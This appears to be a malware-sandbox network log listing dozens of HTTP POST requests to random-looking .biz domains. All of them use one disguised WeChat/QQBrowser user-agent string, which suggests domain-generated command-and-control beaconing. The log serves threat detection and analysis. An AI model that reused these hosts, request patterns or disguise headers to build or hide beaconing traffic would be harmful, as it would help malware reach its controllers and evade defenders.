Source: global traffic	HTTP traffic detected: POST /aatcckarfifoo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /nempu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /agwyffystye HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mgvdqejexijygsb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /cwhybsvpmfyx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wiwimspu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rwiyegsmnxbaierb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yrhkaiacfhbp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /lvawmhxu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hkamlwlybbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fokcciedcqjopse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yxknqhe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bvfgvukbuqpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /mtdievukjebc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gpyvldlckbfoes HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /buaqnbkgjr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ehwru HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lvdayepitqcdyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /sn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lvojr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wkwfipyoltumu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /fxrfgipsrdogf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jagvrjcebgwmee HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xqpxqo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fnppu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /llrqvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hegy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /g HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hwyhtns HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pjkmdseqxhhvplr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gjsue HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /toabwtjv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /ojwsrlrloa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wtojknw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /haroldungxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /wjs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bbqlwawxhwkmtrfc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /am HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xahrrvaf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rfuetphopheyd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bvynwxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /xxyycbpqqgrofbr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /gmkfkxvhjjwggemm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fumyjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hubil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bulntsganndw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ckivxpl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ltyaxjqvibv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /wu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /dgltjhlriyylmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /leqoagwnoid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /aiql HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /yqqmngrjnxvc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /exygmnocmwksy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vbohqiwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /yjcuxjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rwfu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
